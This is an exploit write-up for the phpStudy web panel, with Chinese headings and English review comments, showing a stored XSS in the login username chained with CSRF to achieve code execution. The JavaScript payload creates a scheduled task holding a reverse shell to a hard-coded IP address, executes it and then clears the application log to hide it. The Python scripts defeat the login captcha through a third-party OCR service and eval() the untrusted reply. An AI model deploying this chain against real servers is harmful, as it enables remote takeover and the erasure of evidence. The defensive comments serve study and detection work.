phpstudy xss+csrf组合拳rce+登录入口绕过
// Second stage of the CSRF chain, executed in the victim's browser once
// save() has stored the task: list tasks, run the first one, wipe the log.
// Every request is a relative URL with no anti-CSRF token in its body, so
// each succeeds solely on the cookie the browser attaches automatically —
// the application-side fix is a per-request token (or SameSite cookies plus
// an Origin check) on every state-changing handler under /service/app/.
// NOTE(review): the task_list -> exec_task -> clearlog sequence from one
// session within seconds is the detection signature; because clearlog is
// the anti-forensics step, exec_task should also be recorded somewhere a
// same-session web request cannot erase.
function poc(){
$.get('/service/app/tasks.php?type=task_list',{},function(data){
// Uses the ID of the first task returned — presumably the one save() just
// created; nothing here checks that.
var id=data.data[0].ID;
$.post('/service/app/tasks.php?type=exec_task',{
tid:id
},function(res2){
// Runs only after exec_task has responded; clears the application log.
$.post('/service/app/log.php?type=clearlog',{
},function(res3){},"json");
},"json");
},"json");
}
// First stage: stores a scheduled task whose `shell` field is an
// attacker-chosen command string, then hands off to poc() to trigger it.
// The request carries fixed schedule values plus the raw command and
// nothing that proves user intent (no token, no re-authentication), which
// is what makes it forgeable cross-site.
// NOTE(review): independent of CSRF, a web form that persists an arbitrary
// shell string for later execution is the underlying weakness; the address
// and port inside `shell` are the outbound-connection indicator (egress from
// the web host to an unexpected destination) a defender would alert on.
function save(){
var data=new Object();
// Empty task_id presumably means "create" rather than "update" — confirm
// against the save_shell handler.
data.task_id="";
data.title="test";
// Schedule fields; exact semantics of exec_cycle/week/day are not visible
// here and do not matter because poc() triggers the task immediately.
data.exec_cycle="1";
data.week="1";
data.day="3";
data.hour="17";
data.minute = "05";
data.shell='sh -i >& /dev/tcp/39.101.70.33/1234 0>&1';
$.post('/service/app/tasks.php?type=save_shell',data,function(res){
// Chain into the execute-and-cover-tracks stage once the task is stored.
poc();
},'json');
}
// Entry point: fires as soon as the injected script tag loads in the
// victim's authenticated session — no user interaction is needed.
save();
<script src="xxx/poc.js"></script>
放用户名那里登陆一下就可以了
登录入口绕过方法
main.py
from requests import *
from base64 import *
import ocr
# Fetches a captcha, has it solved by OCR, and submits a login whose
# username is a script tag; the login attempt itself is what stores the
# XSS string. The root cause on the application side is that the submitted
# username is later rendered without output encoding; a CSP would limit the
# blast radius but not fix it.
baseUrl="http://39.101.70.33:9080/"  # same address as the listener in poc.js
codeUrl=baseUrl+"service/app/account.php?type=vercode"
loginUrl=baseUrl+"service/app/account.php"
# One GET for the captcha image. The cookie set on this response is the
# session the captcha is presumably bound to, so it is replayed on the POST.
m=get(codeUrl)
img=b64encode(m.content)
# The captcha is defeated by a commodity OCR service, so it provides no
# brute-force resistance here; per-IP/per-account rate limits and lockout
# are the controls that would actually slow this down.
code=ocr.ocr(img)
header={
# Only the first cookie is forwarded. Raises IndexError if the captcha
# response sets no cookie; assumes exactly one session cookie — TODO confirm.
"Cookie":f"{m.cookies.keys()[0]}={m.cookies.values()[0]}",
# Presumably required by the endpoint to treat this as an AJAX request — verify.
"X-Requested-With":"XMLHttpRequest"
}
print(code)
print(header['Cookie'])
body={
"type":"login",
# The username is not expected to be valid; it is the stored-XSS vector.
"username":"<script>alert(11112222)</script>",
"password":"123456",
"verifycode":code
}
n=post(loginUrl,data=body,headers=header)
# Response body is printed as-is; nothing checks whether the login was
# accepted or rejected.
print(n.text)
ocr.py
from requests import *
def ocr(imgEnc: bytes):
    """Send a base64-encoded captcha image to a third-party solving service
    and return the recognised text.

    The image leaves the host running this script and goes to the operator
    of the service, which is trusted completely (see the eval note below).
    Args: imgEnc — base64 bytes as produced by base64.b64encode.
    Raises: KeyError if the response lacks a 'data'/'data' entry; whatever
    eval raises if the body is not a Python literal.
    """
    ocrUrl="https://www.jfbym.com/api/YmServer/customApi"
    data={
    "image":imgEnc,
    # Left empty here; the service presumably requires an account token — confirm.
    "token":"",
    "type":"10110"
    }
    resp = post(ocrUrl, data=data)
    # NOTE(review): eval() on an HTTP response body executes whatever the
    # remote service returns as Python code on this machine. The response
    # should be parsed with json.loads (or ast.literal_eval) and the missing-
    # key case handled explicitly instead of trusting the body wholesale.
    return eval(resp.text)['data']['data']